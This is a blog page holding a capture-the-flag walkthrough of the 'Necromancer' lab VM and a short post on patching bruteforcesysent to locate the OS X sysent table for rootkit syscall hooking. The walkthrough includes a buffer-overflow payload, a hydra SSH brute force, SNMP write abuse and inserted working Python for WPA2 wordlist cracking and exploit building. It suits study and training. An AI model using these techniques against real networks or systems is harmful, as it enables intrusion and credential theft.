Necromancer by @Xerubus

A few weeks ago I set out to complete more CTFs in my spare time, as they are both beneficial to my learning and there is nothing more rewarding than completing one from start to finish. This led me to a well-known site where I had completed a few previous CTFs; however, none were as difficult or interesting as this one.

So, as a brief introduction: Necromancer has 11 flags, and 'the end goal is simple… destroy The Necromancer!'. With that I loaded the .ova into VirtualBox and began.


I always find the start of these challenges the most difficult, as I haven't spent much time tweaking nmap commands and performing network reconnaissance. I also always manage to get confused and stumped, as I assume the box has an issue when it probably doesn't… nonetheless, I began with some very primitive nmap TCP scans and couldn't even get a response from the box.
I also tried pinging: no result.
Tried primitive UDP scans: no results.

And already I was stumped. However, I remembered that UDP scans are often awkward: UDP is connectionless, so there is no SYN/ACK handshake to confirm a port, and nmap can only mark a UDP port open when the service actually answers a probe (silence is reported as open|filtered, and only an ICMP port-unreachable gives a definite closed). Therefore I tweaked my switches and ran:
 nmap -sU -n -r -T3 -p1-1000 host

(-sU UDP scan, -n no DNS resolution, -r ports in numerical order rather than randomised, -T3 normal timing, -p1-1000 the low ports only.)

This revealed UDP port 666:
666/udp open  doom

With netcat, I opened a UDP connection to that port using

nc -u host 666

Once connected, I was greeted with a taunting message:

 You gasp for air! Time is running out!

After feeding it multiple words such as 'air' and 'Time' just to test, I ran out of time and was disconnected. Confused, I went through the usual process and opened Wireshark to look for any odd network traffic from the host, using the filter ip.addr == host.

While collecting and observing traffic from that host I noticed that it attempts a reverse connection back to my machine on TCP port 4444, so why not listen and see if I can catch that connection..

nc -lvp 4444
inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 17898

It looks like base64…
After putting that blob into a decoder, the result was interesting:


You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.

Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.

The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right!  You are trapped!

You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.

As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.

You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.

You open the box, and find a parchment with the following written on it. “Chant the string of flag1 – u666”


u666 immediately made me think of UDP port 666, so I connected back to udp/666 and fed it the 'chant'; however, it seemed to time out… so I reconnected and this time fed it the MD5 from the flag. It replied with:

Chant had no affect! Try in a different tongue!

A quick Google search revealed the MD5 to be the hash of 'opensesame'. (The flag values on this box are plain MD5s of short words, so a local md5sum of a guess is enough to check it.)

I reconnected and fed it that; it ate it up and spat out this:

A loud crack of thunder sounds as you are knocked to your feet!

Dazed, you start to feel fresh air entering your lungs.

You are free!

In front of you written in the sand are the words:


As you stand to your feet you notice that you can no longer see the flicker of light in the distance.

You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.

As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.

The birds get closer, and closer, and closer.

Staring up at the crows you can see they are in a formation.

Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.

As quickly as the birds appeared, they have left you once again…. alone… tortured by the deafening sound of silence.

666 is closed.

Flag 3

'The numeral 80' led me to think that port 80 is now open, and it is.

When first connecting to the webserver, a paragraph of green 'hacker' text is displayed along with a picture of the evil crows that dropped stuff on you.


Based on previous CTFs from Vulnhub, the first thing I did was download and 'cat' the image looking for any strings; however, it just returned terminal-destroying, DOS-like output.

Next, the webserver: I fired up DIRB to see if there are any common directories. The only result was:
/pics/ – Forbidden

Next, try a couple of nmap scripts.
http-enum revealed nothing.
http-title revealed nothing.

I ran a few more automated scanners such as Nikto, but only because I was somewhat stuck.
After a while scratching my head I thought: why not apply the same logic to the second
flag that I have (an MD5) and see where that takes me. The Google search didn't return anything on the MD5.

Stuck again..

After some research, it turns out binwalk (a tool that scans binary files for embedded file signatures) can carve out files embedded inside other files, JPEGs included… so I ran:

binwalk -e thejpegfile.jpeg (extracted)

And funnily enough it extracted something. So, cd into the extraction directory and cat feathers.txt, where another base64-encoded string decodes to:

flag3{9ad3f62db7b91c28b68137000394639f} –
Cross the chasm at /amagicbridgeappearsatthechasm-


The new hint led to this page:


After reading the new page, I read the source and went straight to the image again to try exactly the same method as for flag 3; however, this did not yield any results.

Stuck again…

The only thing left to do was fuzz the new directory and see if any results could be obtained.
Dirb revealed the file 'talisman'. After downloading the binary I began analysis: chmod +x to make it executable…

when run it gives an interesting result.

 “you have found a talisman.

The talisman is cold to touch, and has no words or symbols on its surface

do you want to wear the talisman?”

I tried 2 simple options:
option 1 – Yes

“nothing happens”

option 2 – No

“Nothing happens”

maybe pass it a flag?

“Nothing happens”

It seemed interesting that it was an executable file that took user input… so, like every other conscientious security enthusiast, I fed it an arbitrary string of ridiculous length and: segfault. 🙂

Now I was hoping this would be fairly straightforward and wouldn't require too much ROP or tinkering, so I began a few preliminary steps.
The first step is to figure out the length of the buffer.

The buffer length is 32.

With a few other tests I knew I had to change the return address to
0x8048a37 to call chantToBreakSpell.

So I fired up a few Metasploit tools to find out more. I used pattern_create.rb and pattern_offset.rb to find any padding between the buffer and the return address; there was none.

Unfortunately, I did not take any screenshots or document this section very well, as it only took me about 10 minutes, so I can only provide what I used to overflow the buffer and change the return address. For a more detailed description of this flag I would recommend looking at another one of the walkthroughs on Vulnhub.

For the command, I prefer Perl as it's what I've used since learning about overflows. As the machine is little-endian, the address 0x8048a37 has to be written byte-reversed: \x37\x8a\x04\x08.

perl -e 'print "A"x32 . "\x37\x8a\x04\x08"' | ./talisman

Once the buffer was overflowed :p and the return address overwritten, the result was:

You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
Chant these words at u31337
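The talisman steps above (find the offset with a cyclic pattern, then overwrite the saved return address with a little-endian pointer to chantToBreakSpell) are worth seeing as code. The following is an added example, not the walkthrough's own tooling: it reimplements the cyclic pattern that pattern_create.rb/pattern_offset.rb produce, so a crash EIP read from gdb can be turned into an offset, and builds the same payload the Perl one-liner does. The buffer length (32) and the address 0x8048a37 are the values the write-up found; the binary path is assumed.

```python
"""Cyclic pattern, offset lookup and payload builder for a 32-bit stack overflow.

Added example (not the write-up's code). 32 and 0x8048a37 come from the
write-up; ./talisman is the downloaded binary.
"""
import string
import struct
import subprocess


def pattern_create(length):
    """Aa0Aa1Aa2...: any 4-byte window is unique within the first 20280 bytes."""
    out = []
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out.append(a + b + c)
                if 3 * len(out) >= length:
                    return "".join(out)[:length].encode()
    return "".join(out)[:length].encode()


def pattern_offset(pattern, eip):
    """Offset of the crash EIP inside the pattern; eip may be an int (as gdb prints it) or 4 raw bytes."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else eip
    idx = pattern.find(needle)
    return idx if idx >= 0 else None


def build_payload(offset, ret_addr):
    """Filler up to the saved return address, then the target address in little-endian byte order."""
    return b"A" * offset + struct.pack("<I", ret_addr)


def run_binary(path, payload):
    """Feed the payload as the answer to the binary's prompt; return (exit code, stdout)."""
    proc = subprocess.run([path], input=payload + b"\n", capture_output=True)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    # 1. crash the binary with a pattern and read EIP from gdb;
    # 2. turn that value into an offset; 3. build the real payload.
    pat = pattern_create(200)
    crash_eip = struct.unpack("<I", pat[32:36])[0]   # stands in for the value gdb would show
    off = pattern_offset(pat, crash_eip)
    payload = build_payload(off, 0x8048a37)
    print("offset", off, "payload", payload)
    print(run_binary("./talisman", payload)[1].decode(errors="replace"))
```

struct.pack("<I", 0x8048a37) yields exactly the \x37\x8a\x04\x08 sequence in the Perl command, which is the check to run whenever a hand-reversed address refuses to work.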

Again, I performed a Google search on the MD5, revealing 'blackmagic'.

The previous flag mentions u31337; based on the previous flags I immediately thought of UDP port 31337.

nc -u host 31337


As you chant the words, a hissing sound echoes from the ice walls.

The blue aura disappears from the cave entrance.

You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.

You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.

The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.

Suddenly, you are attacked by a swarm of bats!

You aimlessly thrash at the air in front of you!

The bats continue their relentless attack, until…. silence.

Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.

Looking towards one of the torches, you see something on the cave wall.

You walk closer, and notice a pile of mutilated bats lying on the cave floor.  Above them, a word etched in blood on the wall.




Flag6 was fairly easy, seeing as it was already on the directory's home page.



Click the hyperlink or navigate to host/thenecromancerwillabsorbyoursoul/necromancer

and binary #2 is presented.


At flag 6 we are presented with a new binary, 'necromancer'.

After rereading the two parts of the page I realised there is a hint to u161,
obviously meaning UDP port 161, so before continuing with analysing the binary
I decided to see what was there…

Couldn't connect to the port, so I fired up a UDP scan while I started looking at the

So after about 2 minutes of analysis it turned out it wasn't a binary; instead it looked to be bzip2-compressed data (block size 900k), so I extracted it with binwalk and then tried to make it executable again. Yet again it was not in an executable format.

Turns out it was a POSIX tar file. When extracted it revealed a .cap file…
Analysing the .cap file in Wireshark revealed multiple authentication and deauthentication frames for the SSID 'community', along with a 4-way handshake. I smell WPA….
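Both the feathers.txt find in the crow picture and the "necromancer" file above come down to the same trick: a file whose first bytes say one thing while something else is embedded or appended further in, peeled layer by layer (bzip2, then tar, then the .cap). The following is an added example, not the walkthrough's code or binwalk's: a small signature scanner plus a layer-peeler that reports what it finds. The sample input (a stub JPEG with a bzip2-compressed tar appended, holding one constructed .cap) is built in the test and is not data from the VM.

```python
"""Signature scan and layer peeling in the spirit of binwalk.

Added example (not the write-up's code). The magic table is the usual set;
the JPEG-trailer check covers the "data appended after FF D9" hiding spot.
"""
import bz2
import gzip
import io
import tarfile

MAGICS = [
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\x1f\x8b\x08", "gzip"),
    (b"PK\x03\x04", "zip"),
    (b"\xd4\xc3\xb2\xa1", "pcap (little-endian)"),
    (b"\xa1\xb2\xc3\xd4", "pcap (big-endian)"),
    (b"\x0a\x0d\x0d\x0a", "pcapng"),
]
BZ2_BLOCK_MAGIC = b"\x31\x41\x59\x26\x53\x59"   # the "pi" marker that follows BZh<level>


def scan_signatures(data):
    """Return sorted (offset, description) pairs for every magic found anywhere in data."""
    hits = []
    for magic, name in MAGICS:
        pos = data.find(magic)
        while pos >= 0:
            hits.append((pos, name))
            pos = data.find(magic, pos + 1)
    # bzip2: "BZh" is plain ASCII, so also demand the level digit and the block magic
    pos = data.find(b"BZh")
    while pos >= 0:
        if data[pos + 3:pos + 4].isdigit() and data[pos + 4:pos + 10] == BZ2_BLOCK_MAGIC:
            hits.append((pos, "bzip2 (block size %s00k)" % data[pos + 3:pos + 4].decode()))
        pos = data.find(b"BZh", pos + 1)
    # tar: the "ustar" magic sits 257 bytes into the first header block
    pos = data.find(b"ustar")
    while pos >= 0:
        if pos >= 257:
            hits.append((pos - 257, "tar"))
        pos = data.find(b"ustar", pos + 1)
    return sorted(hits)


def trailing_after_jpeg(data):
    """Everything after the first JPEG end-of-image marker (FF D9); viewers ignore it, carvers do not."""
    eoi = data.find(b"\xff\xd9")
    return data[eoi + 2:] if eoi >= 0 else b""


def unwrap(blob):
    """Peel bzip2/gzip/tar layers recursively; returns {member path: leaf bytes} ('' for a bare leaf)."""
    if blob[:3] == b"BZh":
        return unwrap(bz2.decompress(blob))
    if blob[:2] == b"\x1f\x8b":
        return unwrap(gzip.decompress(blob))
    if len(blob) > 262 and blob[257:262] == b"ustar":
        leaves = {}
        with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tar:
            for member in tar.getmembers():
                if member.isfile():
                    inner = unwrap(tar.extractfile(member).read())
                    for path, content in inner.items():
                        leaves[member.name + ("/" + path if path else "")] = content
        return leaves
    return {"": blob}


def describe(data):
    """One-line label for a leaf, using the same magic table (only a hit at offset 0 counts)."""
    hits = [name for off, name in scan_signatures(data) if off == 0]
    return hits[0] if hits else "unknown"


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read()
    for off, name in scan_signatures(data):
        print("%8d  %s" % (off, name))
    for off, name in scan_signatures(data):
        if name.startswith(("bzip2", "gzip", "tar")):
            for path, leaf in unwrap(data[off:]).items():
                print("carved from %d: %s -> %s, %d bytes" % (off, path or "(bare)", describe(leaf), len(leaf)))
            break
```

Carving from the signature offset to end of file is what binwalk -e does for compressed streams; the recursion is what saves running binwalk three times on the same file.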

After analysing the cap file, it looked to be a WPA2 capture.
With that, I used aircrack-ng and rockyou.txt to crack the password.

Password: death2all
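What aircrack-ng is doing with rockyou.txt against that handshake is worth spelling out, because the same derivation explains why WPA2 cracking is slow (4096 rounds of PBKDF2 per candidate) and why one captured handshake is enough. The following is an added example, not the walkthrough's code or aircrack-ng's: it derives PMK and PTK as IEEE 802.11i specifies and checks the EAPOL MIC for each wordlist entry. The SSID 'community' and the passphrase 'death2all' are from the write-up; the MAC addresses, nonces and EAPOL frame are constructed so it runs without the real .cap file.

```python
"""Wordlist attack on a WPA2 4-way handshake, the way aircrack-ng does it.

Added example (not the write-up's code). The handshake below is constructed;
only the SSID and the answer come from the write-up.
"""
import hashlib
import hmac


def pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes): the expensive step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from IEEE 802.11i: HMAC-SHA1 in counter mode over the sorted MACs and nonces."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]   # KCK = [:16], KEK = [16:32], TK = [32:48]


# EAPOL hdr(4) + descriptor(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def eapol_mic(kck, eapol):
    """WPA2/CCMP MIC: HMAC-SHA1 over the EAPOL-Key frame with its MIC field zeroed, cut to 16 bytes.
    (WPA/TKIP uses HMAC-MD5 here instead.)"""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(hs, wordlist):
    """First candidate whose derived KCK reproduces the captured MIC, else None."""
    for word in wordlist:
        word = word.strip()
        if not 8 <= len(word) <= 63:      # WPA passphrases are 8..63 characters; skip the rest unhashed
            continue
        k = ptk(pmk(word, hs["ssid"]), hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(k[:16], hs["eapol"]), hs["mic"]):
            return word
    return None


def sample_handshake(passphrase="death2all", ssid="community"):
    """Constructed message 2 of 4 whose MIC was produced with `passphrase` (stands in for the .cap)."""
    ap_mac = bytes.fromhex("00112233aabb")
    sta_mac = bytes.fromhex("66778899ccdd")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    eapol = (b"\x01\x03\x00\x5f"            # version 1, type EAPOL-Key, body length 95
             + b"\x02\x01\x0a\x00\x10"       # RSN descriptor, key info 0x010a, key length 16
             + b"\x00" * 8 + snonce          # replay counter, SNonce
             + b"\x00" * 32                  # IV, RSC, ID
             + b"\x00" * 16 + b"\x00\x00")   # MIC placeholder, key data length 0
    k = ptk(pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(k[:16], eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": mic}


if __name__ == "__main__":
    print(crack(sample_handshake(), ["password", "12345678", "death2all", "letmein1"]))
```

The MIC check needs the SSID, both MACs, both nonces and one MIC-bearing EAPOL frame, which is exactly why a deauth-and-reconnect capture like the one in the .cap is all an attacker needs.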

Now with the password I thought to connect to UDP 161 and see what I can do…
Couldn't seem to connect to UDP 161; an nmap scan revealed 161 to be the SNMP port.
I had never worked with SNMP before, so a bit of research was required for this section.

snmp-check? Starting to get stuck, as I had no idea what SNMP does or is.

Truly had no idea what to do… never seen this before.
After a long period of being stuck, I realised I was never going to solve this section if I didn't have some guidance, seeing as I had never done anything with SNMP and all my Google searches were inconclusive. So with some help from ContactLeft's walkthrough I used:

snmp-check -t host -c death2all (the community string)

the results are:

So, I'm thinking that death2allrw is the correct community string. (In SNMP v1/v2c the community string is the entire credential, sent in cleartext in every datagram; a read-only community lets you walk the tree, while a read-write one lets you set values, which is why the rw string is the one that matters here.)
After a while of being dazed and confused, and because I had no idea about SNMP, I decided to treat this part as more of a learning section and used ContactLeft's walkthrough for guidance…

snmpset -c death2allrw -v 2c iso. s “Unlocked . death2allrw!”

That unlocked the door and gave me this response:

After flag7, I realised that there are still so many areas of security that I have never even touched on, SNMP being one of them.

Regardless, I have the flag.

flag7{9e5494108d10bbd5f9e7ae52239546c4} – t22
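The snmp-check and snmpset steps above hide what is actually on the wire, and seeing it is the quickest way to understand why a community string is a password and why an agent seems "unreachable" until you guess it (v1/v2c agents silently drop datagrams whose community is wrong, so a closed-looking udp/161 can simply be an unguessed community). The following is an added example, not the walkthrough's code or net-snmp's: a minimal BER encoder/decoder for SNMPv2c GetRequest/SetRequest messages. The OID the write-up sets is elided on the page, so the writable target here (sysLocation.0) is an assumption for illustration, as is the placeholder host.

```python
"""Hand-rolled SNMPv2c: try community strings with a GET, then a SET over the rw one.

Added example (not the write-up's code). Community strings come from the
write-up; the target OID and host are placeholders.
"""
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"
SYS_LOCATION = "1.3.6.1.2.1.1.6.0"       # assumed writable target; the real OID is not on the page
GET_REQUEST, GET_RESPONSE, SET_REQUEST = 0xA0, 0xA2, 0xA3
ERROR_STATUS = {0: "noError", 4: "readOnly", 6: "noAccess", 16: "authorizationError", 17: "notWritable"}


def _length(n):
    """BER length: one byte below 128, otherwise 0x80|count followed by the big-endian value."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _length(len(body)) + body


def _int(v):
    """INTEGER, minimal two's-complement encoding."""
    return _tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def _oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*x+y, the rest base-128 with continuation bits."""
    parts = [int(p) for p in dotted.split(".")]
    out = bytearray([40 * parts[0] + parts[1]])
    for sub in parts[2:]:
        chunk = [sub & 0x7F]
        sub >>= 7
        while sub:
            chunk.append(0x80 | (sub & 0x7F))
            sub >>= 7
        out += bytes(reversed(chunk))
    return _tlv(0x06, bytes(out))


def build_message(community, pdu_type, oid, value=None, request_id=1):
    """Message ::= SEQUENCE { version INTEGER(1 = v2c), community OCTET STRING, PDU }."""
    val = _tlv(0x05, b"") if value is None else _tlv(0x04, value.encode())   # NULL for GET, string for SET
    varbind = _tlv(0x30, _oid(oid) + val)
    pdu = _tlv(pdu_type, _int(request_id) + _int(0) + _int(0) + _tlv(0x30, varbind))
    return _tlv(0x30, _int(1) + _tlv(0x04, community.encode()) + pdu)


def _read_tlv(buf, pos):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln


def _decode_oid(body):
    parts, cur = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(cur)
            cur = 0
    return ".".join(map(str, parts))


def parse_message(data):
    """Return (community, pdu_type, request_id, error_status, [(oid, value), ...])."""
    _, msg, _ = _read_tlv(data, 0)
    _, _, p = _read_tlv(msg, 0)                      # version
    _, community, p = _read_tlv(msg, p)
    pdu_type, pdu, _ = _read_tlv(msg, p)
    _, rid, p = _read_tlv(pdu, 0)
    _, err, p = _read_tlv(pdu, p)
    _, _, p = _read_tlv(pdu, p)                      # error-index
    _, vbl, _ = _read_tlv(pdu, p)
    varbinds, p = [], 0
    while p < len(vbl):
        _, vb, p = _read_tlv(vbl, p)
        _, oid, q = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, q)
        varbinds.append((_decode_oid(oid), val.decode(errors="replace") if vtag == 0x04 else val))
    return (community.decode(), pdu_type, int.from_bytes(rid, "big", signed=True),
            int.from_bytes(err, "big", signed=True), varbinds)


def snmp_exchange(host, msg, timeout=3.0):
    """One datagram to udp/161; None when the agent stays silent (bad community or filtered)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(msg, (host, 161))
        try:
            data, _ = s.recvfrom(65535)
        except OSError:
            return None
    return parse_message(data)


def classify(reply):
    """Silence means the community was dropped; an error-status says what the community may not do."""
    if reply is None:
        return "no reply (wrong community or filtered)"
    return ERROR_STATUS.get(reply[3], "error %d" % reply[3])


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"   # placeholder address
    for community in ("public", "death2all", "death2allrw"):
        rep = snmp_exchange(host, build_message(community, GET_REQUEST, SYS_DESCR))
        print(community, "GET ->", classify(rep), rep[4] if rep else "")
    rep = snmp_exchange(host, build_message("death2allrw", SET_REQUEST, SYS_LOCATION, "Unlocked"))
    print("SET ->", classify(rep))
```

A SET over the read-only community comes back with a non-zero error-status rather than silence, so the difference between "no reply" and "noAccess"/"notWritable" tells you whether you have the wrong string or merely the wrong privilege.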

Flag8, Flag9, Flag10

After not knowing anything about how to get flag7, I was concerned I would find myself stuck again; however, I had a small hint of t22 (TCP), i.e. SSH, so I pushed on…

Confirming that port 22 was open, I did what anyone logical would do and ssh'd to it.

The flag7 MD5 also revealed 'demonslayer', potentially a username or password…

With only an SSH port open it is difficult to determine what to do, so I tried a brute force…

hydra -l demonslayer -V -P rockyou.txt host ssh


Now to see if it actually works..

I'm in! And immediately haunted by the banner…

Now that I'm in, I should look around. In the home directory there is flag8.txt. *wonders what could be in there* cat flag8.txt…

You enter the Necromancer’s Lair!

A stench of decay fills this place.

Jars filled with parts of creatures litter the bookshelves.

A fire with flames of green burns coldly in the distance.

Standing in the middle of the room with his back to you is the Necromancer.

In front of him lies a corpse, indistinguishable from any living creature you have seen before.

He holds a staff in one hand, and the flickering object in the other.

“You are a fool to follow me here!  Do you not know who I am!”

The necromancer turns to face you.  Dark words fill the air!

“You are damned already my friend.  Now prepare for your own death!”

Defend yourself!  Counter attack the Necromancer’s spells at u777!

With that, I promptly moved to counter-attack at UDP 777.

UDP 777 isn't open on the host… After some confusion I ran netstat -a, which showed 777 listening, but only on localhost. So within the SSH session I connected to 777 on localhost. On connection I was greeted with a question:

Where do the Black Robes practice magic of the Greater Path?

Not knowing the answer, I had 3 attempts; after those it closed the connection and kicked me out. Now I couldn't connect back to the host at all, and I confirmed that the IP hadn't changed.

So, I whipped up an incredibly simple script to see if it was a time-based lockout.


while true; do
    echo "attempting to connect..."
    ssh demonslayer@host
    sleep 30
done

I'm sure I don't need to explain that… but it essentially attempts to ssh every 30 seconds.
After a few minutes I noticed it still wasn't connecting, so I turned to a few port scans to see if any changes had occurred. No ports seemed to be open in either protocol. Seems odd…
After more scans and searches I found that UDP port 666 was open… surely the whole instance hadn't been reset? It had.

After this reset, I decided to write up the steps in case it happened again:

  1. feed opensesame to port 666
  2. browse to /amagicbridgeappearsatthechasm
  3. download /talisman file
  4. feed blackmagic to port 31337
  5. browse to /thenecromancerwillabsorbyoursoul
  6. download /necromancer file
  7. run snmpset -c death2allrw -v 2c iso. s "Unlocked . death2allrw!"
  8. ssh demonslayer@host (password 12345678)
  9. nc -u localhost 777

Originally, I thought these questions would be incredibly cryptic and difficult.
So, back to where I began, I was presented with question 1:
Where do the Black Robes practice magic of the Greater Path?

The answer required a quick Google search and uncovered Kelewan, a fictional world home to the Tsurani…
As it was correct, I was presented with flag8.


Who did Johann Faust VIII make a deal with?

Originally I uncovered that it was the Devil, but '(more commonly known as Mephistopheles in Faust literature)',
so I fed it Mephistophel and…


Who is tricked into passing the Ninth Gate?
This revealed that 'Hedge' was tricked..

With that answer, a block of text was returned (along with flag10):


A great flash of light knocks you to the ground; momentarily blinding you!

As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.

An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.

The room is silent.

You walk over to where the Necromancer once stood.

On the ground is a small vile.



So I exited the localhost connection, as it wasn't doing anything, and resumed searching for the next flag. A TCP scan revealed SSH to still be open, which was good; my UDP scan revealed only 161 to still remain open. I increased the port range just in case some were missing..

At this point I sort of had no idea what to do. After being stuck for about an hour, not knowing how to get this last flag, I turned to just enumerating commands and realised that it had to be in the home folder. So an ls -al showed me a file named .smallvile, which was obviously the final piece of the puzzle..

cat .smallvile reveals:


Clearly, I've just been elevated to root privileges. But I still had uid=1000, so maybe not.
sudo -l reveals that user demonslayer may run the following commands on thenecromancer:

(ALL) NOPASSWD: /bin/cat /root/flag11.txt

With that, I ran the command sudo /bin/cat /root/flag11.txt




Well, I've collected all 11 flags, so the Necromancer has been destroyed!

Concluding remarks

The Necromancer was by far one of the most entertaining and well-written CTFs on Vulnhub, along with being very beginner friendly. I would highly recommend it to anyone who is starting out with CTFs.

10/10 for enjoyment
5/10 for difficulty (SNMP section :X)
10/10 would do another…

Thanks for all the good work @xerubus & @vulnhub.

ContactLefts Walkthrough –



Bruteforcesysent ‘Fix’ for Yosemite

In my recent research into BSD/OS X rootkits I discovered an issue with syscall hooks on OS X. This issue came about after Apple decided to stop exporting the sysent table (I wonder why), thus making it difficult to hook system calls.

The sysent table within the BSD section of the OS X kernel is an array of struct sysent entries, one per system call, each holding the handler's function pointer and argument information (the screenshot of the struct definition is not reproduced here).

Luckily, gdbinit created a great tool for finding the sysent table address: bruteforcesysent.

The bruteforcesysent tool works on all versions of OS X up to Yosemite, where users run into the error:

[ERROR] Error while opening /dev/kmem. Is /dev/kmem enabled?

(The question in the message is the first thing to check: /dev/kmem does not exist at all unless the kernel was booted with the kmem=1 boot-arg.)

This error comes from the tool's inability to open /dev/kmem, regardless of whether it runs as root. After a bit of digging I discovered that the tool in fact opens /dev/kmem with O_RDWR, i.e. for reading and writing. This means that in order to proceed it needs write permission as well as read permission. That is of course difficult on /dev/kmem, as write permission cannot be granted (or at least, as far as my research went, I couldn't get any), meaning the line:

if ((fd_kmem = open("/dev/kmem", O_RDWR)) == -1)

will always fail. With some testing and many chmods I discovered that I could grant root read permission on /dev/kmem. This led me to think that if the tool were able to read kmem it would be able to find the address of sysent, since locating the table only requires scanning kernel memory, not writing to it. Therefore I changed the line above to:

if ((fd_kmem = open("/dev/kmem", O_RDONLY)) == -1)

This solved the issue and allowed me to brute-force kmem and discover the address of sysent. The tool is incredibly useful for anyone attempting to use the no-longer-exported table, and I want to thank gdbinit for all the hard work he put into releasing this publicly!

Hopefully this helps some people who can't get bruteforcesysent to work on Yosemite!

P.S. I'm sure someone will be able to get write permission on kmem, as I didn't look into it deeply; feel free to send me an email if you figure out how, as I would love to know!

Link to tool & gdbinit's GitHub –

gdbinit’s website –